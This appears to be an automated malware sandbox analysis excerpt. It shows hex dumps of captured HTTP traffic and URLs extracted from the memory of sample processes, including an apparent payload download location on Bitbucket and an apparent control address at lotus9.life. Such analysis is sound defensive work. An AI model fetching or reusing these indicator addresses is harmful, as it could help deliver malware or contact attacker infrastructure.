              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:50 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a72cd5-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 c6 95 37 36 cf 58 a7 76 1c bf 17 ec 98 32 e2 f6 68 43 75 b8 1c f0 1e 6b b1 fe d8 b7 a5 13 f8 b5 fa f5 bd b5 53 d6 99 ad ad f6 19 ab 69 65 42 32 61 0c 8b 43 f7 56 65 b1 98 5a d5 f2 b8 ef f4 45 2c cd ab 71 b5 5e 41 7f 11 45 41 f4 8c 03 1a 6c 15 63 e2 c8 6e 55 ca 82 e0 94 dc c9 63 d9 57 4e 7e 6e bd 08 31 f0 1b 59 24 7e 66 dd e6 07 95 f5 9b 7b 76 92 8e 96 86 6b 37 e8 4d 72 60 77 8d 10 be 62 fa 5f 87 dc d7 c9 c0 aa da 14 6c a7 9f 3a dd 41 c7 75 06 43 09 3c 90 2c 11 95 e5 a8 ce 9d 4e f6 80 44 ce b4 68 e9 19 e4 7b ce f6 d2 a1 86 1f 48 52 49 8a 5d 4c 94 7c 93 1c 25 8f 93 83 e4 09 4b be 4b f6 d3 8f f0 f1 7e 72 98 7e 9c de c4 e7 43 fc 1e 25 f7 92 7d 7a 7c 6f c5 ef c6 e1 5a 13 c1 a8 c3 b6 6b 10 6a 73 ac 0e a5 0c e3 8b 96 85 d8 33 11 bd 3a 18 fc a0 1f b8 6e b0 c3 fc 20 08 05 50 82 0f 88 03 a0 45 44 c0 33 8f 06 14 d3 9d 2e 82 7e 04 65 fe 4a b3 9b e9 47 e9 ad a6 c5 db 4d 0b eb 68 37 e7 16 33 10 9d 4e 16 e8 c6 4e c4 c3 10 42 33 03 cf b7 77 54 2c 76 10 0b 60 85 a5 9d 94 5b 86 41 2c c1 21 46 2c b9 74 6c 38 60 6e d6 19 5b 1b d9 fc e4 a7 d5 a9 35 e6 3c 62 28 6a a8 2c a6 8d e1 6a bb 19 2e 1f da 13 1a c4 88 d4 e7 77 55 b3 1b b5 93 43 ed ad e4 07 72 63 f2 83 72 ed c3 63 ce 9c b1 78 b8 6c d5 dd b1 94 81 1f e7 e6 c6 b2 4b 18 d0 0f a1 a5 fe 00 1f b8 41 d4 51 4e 16 be 4d 48 cb 1e c4 ce 35 d1 81 fb 3d ee 2a 5f 64 26 2d c6 17 e6 cb fa 2b bf 80 91 4b 22 42 de eb c1 4b 1d 97 80 33 0f 3c a2 67 0d 3e 6b 67 18 38 b1 b5 6e 0f 85 3d 6a ad f4 54 9a 58 c0 de 2b dc 0b d7 30 a4 13 07 e3 c8 16 ad 5c 03 e2 e5 4a fb d7 24 84 70 c8 ca cb a5 b0 29 ab af 88 bb 14 8d 27 2f a7 17 78 dc 29 e8 3d 0f 99 92 e6 ba 83 e5 8b 1d 6b 7d 2c bd 5c b3 45 ca d3 63 4a 30 63 2f 57 7c 85 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 2d 96 3c c8 49 e1 74 29 0e e3 90 fb 0b 10 1b 46 81 17 18 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 c6 95 37 36 cf 58 a7 76 1c bf 17 ec 98 32 e2 f6 68 43 75 b8 1c f0 1e 6b b1 fe d8 b7 a5 13 f8 b5 fa f5 bd b5 53 d6 99 ad ad f6 19 ab 69 65 42 32 61 0c 8b 43 f7 56 65 b1 98 5a d5 f2 b8 ef f4 45 2c cd ab 71 b5 5e 41 7f 11 45 41 f4 8c 03 1a 6c 15 63 e2 c8 6e 55 ca 82 e0 94 dc c9 63 d9 57 4e 7e 6e bd 08 31 f0 1b 59 24 7e 66 dd e6 07 95 f5 9b 7b 76 92 8e 96 86 6b 37 e8 4d 72 60 77 8d 10 be 62 fa 5f 87 dc d7 c9 c0 aa da 14 6c a7 9f 3a dd 41 c7 75 06 43 09 3c 90 2c 11 95 e5 a8 ce 9d 4e f6 80 44 ce b4 68 e9 19 e4 7b ce f6 d2 a1 86 1f 48 52 49 8a 5d 4c 94 7c 93 1c 25 8f 93 83 e4 09 4b be 4b f6 d3 8f f0 f1 7e 72 98 7e 9c de c4 e7 43 fc 1e 25 f7 92 7d 7a 7c 6f c5 ef c6 e1 5a 13 c1 a8 c3 b6 6b 10 6a 73 ac 0e a5 0c e3 8b 96 85 d8 33 11 bd 3a 18 fc a0 1f b8 6e b0 c3 fc 20 08 05 50 82 0f 88 03 a0 45 44 c0 33 8f 06 14 d3 9d 2e 82 7e 04 65 fe 4a b3 9b e9 47 e9 ad a6 c5 db 4d 0b eb 68 37 e7 16 33 10 9d 4e 16 e8 c6 4e c4 c3 10 42 33 03 cf b7 77 54 2c 76 10 0b 60 85 a5 9d 94 5b 86 41 2c c1 21 46 2c b9 74 6c 38 60 6e d6 19 5b 1b d9 fc e4 a7 d5 a9 35 e6 3c 62 28 6a a8 2c a6 8d e1 6a bb 19 2e 1f da 13 1a c4 88 d4 e7 77 55 b3 1b b5 93 43 ed ad e4 07 72 63 f2 83 72 ed c3 63 ce 9c b1 78 b8 6c d5 dd b1 94 81 1f e7 e6 c6 b2 4b 18 d0 0f a1 a5 fe 00 1f b8 41 d4 51 4e 16 be 4d 48 cb 1e c4 ce 35 d1 81 fb 3d ee 2a 5f 64 26 2d c6 17 e6 cb fa 2b bf 80 91 4b 22 42 de eb c1 4b 1d 97 80 33 0f 3c a2 67 0d 3e 6b 67 18 38 b1 b5 6e 0f 85 3d 6a ad f4 54 9a 58 c0 de 2b dc 0b d7 30 a4 13 07 e3 c8 16 ad 5c 03 e2 e5 4a fb d7 24 84 70 c8 ca cb a5 b0 29 ab af 88 bb 14 8d 27 2f a7 17 78 dc 29 e8 3d 0f 99 92 e6 ba 83 e5 8b 1d 6b 7d 2c bd 5c b3 45 ca d3 63 4a 30 63 2f 57 7c 85 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 2d 96 3c c8 49 e1 74 29 0e e3 90 fb 0b 10 1b 46 81 17 18 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:04:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 18 b6 45 52 79 38 fd e4 24 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ea ee 50 12 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d 27 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a db a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca fb 57 7e 61 9c c7 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 db 73 db 11 3b 61 10 c9 52 d7 1d a7 27 87 ad 9e d8 76 6c 61 a8 2f 0d c7 77 a4 c3 5d 23 b6 b9 2b 5a ab 10 21 1d e9 8a f6 ce ce 8e 69 87 98 32 72 76 cd c0 77 1d 5f 34 2d fd a8 89 2f 23 16 09 b7 55 89 e5 c4 15 f1 50 08 cc e2 89 9e c3 5b 15 ee ba 15 36 8c 44 bf d0 55 e9 66 f0 b1 0c 4c 3b 8e 31 c3 74 bc 83 55 e4 bd fb 1c 6a 05 be 89 3f eb ab 15 46 e6 83 b5 3c 3e 10 d6 ae a1 3a b6 9b b1 1d 39 a1 6c 5b 67 9a a7 37 df ba f4 c6 95 37 36 cf 58 a7 76 1c bf 17 ec 98 32 e2 f6 68 43 75 b8 1c f0 1e 6b b1 fe d8 b7 a5 13 f8 b5 fa f5 bd b5 53 d6 99 ad ad f6 19 ab 69 65 42 32 61 0c 8b 43 f7 56 65 b1 98 5a d5 f2 b8 ef f4 45 2c cd ab 71 b5 5e 41 7f 11 45 41 f4 8c 03 1a 6c 15 63 e2 c8 6e 55 ca 82 e0 94 dc c9 63 d9 57 4e 7e 6e bd 08 31 f0 1b 59 24 7e 66 dd e6 07 95 f5 9b 7b 76 92 8e 96 86 6b 37 e8 4d 72 60 77 8d 10 be 62 fa 5f 87 dc d7 c9 c0 aa da 14 6c a7 9f 3a dd 41 c7 75 06 43 09 3c 90 2c 11 95 e5 a8 ce 9d 4e f6 80 44 ce b4 68 e9 19 e4 7b ce f6 d2 a1 86 1f 48 52 49 8a 5d 4c 94 7c 93 1c 25 8f 93 83 e4 09 4b be 4b f6 d3 8f f0 f1 7e 72 98 7e 9c de c4 e7 43 fc 1e 25 f7 92 7d 7a 7c 6f c5 ef c6 e1 5a 13 c1 a8 c3 b6 6b 10 6a 73 ac 0e a5 0c e3 8b 96 85 d8 33 11 bd 3a 18 fc a0 1f b8 6e b0 c3 fc 20 08 05 50 82 0f 88 03 a0 45 44 c0 33 8f 06 14 d3 9d 2e 82 7e 04 65 fe 4a b3 9b e9 47 e9 ad a6 c5 db 4d 0b eb 68 37 e7 16 33 10 9d 4e 16 e8 c6 4e c4 c3 10 42 33 03 cf b7 77 54 2c 76 10 0b 60 85 a5 9d 94 5b 86 41 2c c1 21 46 2c b9 74 6c 38 60 6e d6 19 5b 1b d9 fc e4 a7 d5 a9 35 e6 3c 62 28 6a a8 2c a6 8d e1 6a bb 19 2e 1f da 13 1a c4 88 d4 e7 77 55 b3 1b b5 93 43 ed ad e4 07 72 63 f2 83 72 ed c3 63 ce 9c b1 78 b8 6c d5 dd b1 94 81 1f e7 e6 c6 b2 4b 18 d0 0f a1 a5 fe 00 1f b8 41 d4 51 4e 16 be 4d 48 cb 1e c4 ce 35 d1 81 fb 3d ee 2a 5f 64 26 2d c6 17 e6 cb fa 2b bf 80 91 4b 22 42 de eb c1 4b 1d 97 80 33 0f 3c a2 67 0d 3e 6b 67 18 38 b1 b5 6e 0f 85 3d 6a ad f4 54 9a 58 c0 de 2b dc 0b d7 30 a4 13 07 e3 c8 16 ad 5c 03 e2 e5 4a fb d7 24 84 70 c8 ca cb a5 b0 29 ab af 88 bb 14 8d 27 2f a7 17 78 dc 29 e8 3d 0f 99 92 e6 ba 83 e5 8b 1d 6b 7d 2c bd 5c b3 45 ca d3 63 4a 30 63 2f 57 7c 85 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 2d 96 3c c8 49 e1 74 29 0e e3 90 fb 0b 10 1b 46 81 17 18 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:04:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 63 70 61 6d 65 72 69 78 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b
              Source: ObMmiCfBgqmt.exe, 0000000E.00000002.2494174819.0000000004C92000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lotus9.life
              Source: ObMmiCfBgqmt.exe, 0000000E.00000002.2494174819.0000000004C92000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lotus9.life/t67j/
              Source: z10982283782.exe, z10982283782.exe, 00000000.00000003.1236423933.0000000002900000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8FF000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1351975173.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1416330856.000000007FA2F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: z10982283782.exe, 00000000.00000003.1283909227.000000000073D000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1284189717.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paa
              Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paaF
              Source: z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paaj
              Source: z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
              Source: z10982283782.exe, 00000000.00000002.1349705581.000000000074E000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
              Source: z10982283782.exe, 00000000.00000003.1283909227.000000000073D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/%
              Source: z10982283782.exe, 00000000.00000002.1385371181.00000000215EC000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1385371181.00000000215EA000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-
              Source: z10982283782.exe, 00000000.00000002.1349705581.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/S
              Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000777000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2
              Source: z10982283782.exe, 00000000.00000003.1283909227.0000000000727000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.000000000072D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/Q
              Source: z10982283782.exe, 00000000.00000002.1384175614.00000000209E8000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.00000000006EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw
              Source: z10982283782.exe, 00000000.00000002.1349705581.00000000006EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/akeem4u/canter/downloads/233_LtspwqrtyswX
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: takeown.exe, 0000000D.00000003.1712574823.0000000007720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.cpamerix.online&rand=
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
              Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
